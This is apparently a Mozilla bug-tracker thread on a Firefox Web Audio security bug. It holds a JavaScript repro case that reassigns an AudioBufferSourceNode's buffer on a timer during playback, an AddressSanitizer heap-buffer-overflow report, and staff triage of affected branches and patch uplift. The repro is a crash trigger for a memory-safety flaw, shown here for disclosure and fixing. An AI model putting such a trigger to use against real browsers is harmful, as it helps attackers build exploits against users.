Tested on: OS: Ubuntu 12.04 Firefox: ASAN opt-build 24.0a1 from https://ftp.mozilla.org/pub/mozilla.org/firefox/tinderbox-builds/mozilla-central-linux64-asan/1369217427/ Repro-case: <script> var Context0= new AudioContext() var BufferSource6=Context0.createBufferSource(); setInterval(function(){ BufferSource6.buffer=function(){ var length=11283; var Buffer=Context0.createBuffer(1,length,Context0.sampleRate); var bufferData= Buffer.getChannelData(0); for (var i = 0; i < length; ++i) { bufferData[i] = Math.sin(i*(624))}; return Buffer; }(); },0) BufferSource6.start(0.15831333969254047,0.23571860056836158,0.529235512483865); BufferSource6.buffer=function(){ var length=48517; var Buffer=Context0.createBuffer(1,length,Context0.sampleRate); var bufferData= Buffer.getChannelData(0); for (var i = 0; i < length; ++i) { bufferData[i] = Math.sin(i*(365))}; return Buffer; }(); </script> ASAN-report: ==31496== ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f44ca227118 at pc 0x7f44f856318d bp 0x7f44d0c10070 sp 0x7f44d0c10068 READ of size 1 at 0x7f44ca227118 thread T26 #0 0x7f44f856318c in mozilla::dom::AudioBufferSourceNodeEngine::CopyFromInputBuffer(mozilla::AudioChunk*, unsigned int, unsigned long, unsigned long, unsigned int) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/media/webaudio/AudioBufferSourceNode.cpp:172 #1 0x7f44f856171f in mozilla::dom::AudioBufferSourceNodeEngine::ProduceAudioBlock(mozilla::AudioNodeStream*, mozilla::AudioChunk const&, mozilla::AudioChunk*, bool*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/media/webaudio/AudioBufferSourceNode.cpp:392 #2 0x7f44f84d117e in mozilla::AudioNodeStream::ProduceOutput(long, long) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/media/AudioNodeStream.cpp:411 #3 0x7f44f853ec83 in mozilla::MediaStreamGraphImpl::ProduceDataForStreamsBlockByBlock(unsigned int, long, long) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/media/MediaStreamGraph.cpp:937 #4 0x7f44f8550e05 in mozilla::(anonymous namespace)::MediaStreamGraphThreadRunnable::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/media/MediaStreamGraph.cpp:1163 #5 0x7f44fabe2212 in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/obj-firefox/xpcom/build/nsThreadUtils.cpp:238 . . .

For the analysis, see bug 874934.

Triaging with Ehsan, affects 22 through 24.

WebAudio is disabled in Firefox 22 and 23, correct?

This should have gone through sec-approval before going in if it isn't disabled based on earlier comments and the rating. https://wiki.mozilla.org/Security/Bug_Approval_Process We'll need to take this on Aurora and Beta now to make sure we don't ship it if it isn't disabled by default. Please nominate patches for those branches. What are the risks associated with doing so? Will the existing patch apply?

(In reply to Daniel Veditz [:dveditz] from comment #9) > WebAudio is disabled in Firefox 22 and 23, correct? Like all Web Audio bugs, it affects trunk, and 23, until 23 goes to beta. (In reply to Al Billings [:abillings] from comment #10) > We'll need to take this on Aurora and Beta now to make sure we don't ship it > if it isn't disabled by default. Please nominate patches for those branches. > What are the risks associated with doing so? Will the existing patch apply? This is not needed on Beta since Web Audio is disabled there. And it will be disabled on 23 once it gets to release. Most if not all of these security bugs are relatively low-risk but there is some effort involved in uplifting them all to Aurora, and I'm not sure if we need to do that since we know that 23 will not ship Web Audio...

Mass moving Web Audio bugs to the Web Audio component. Filter on duckityduck.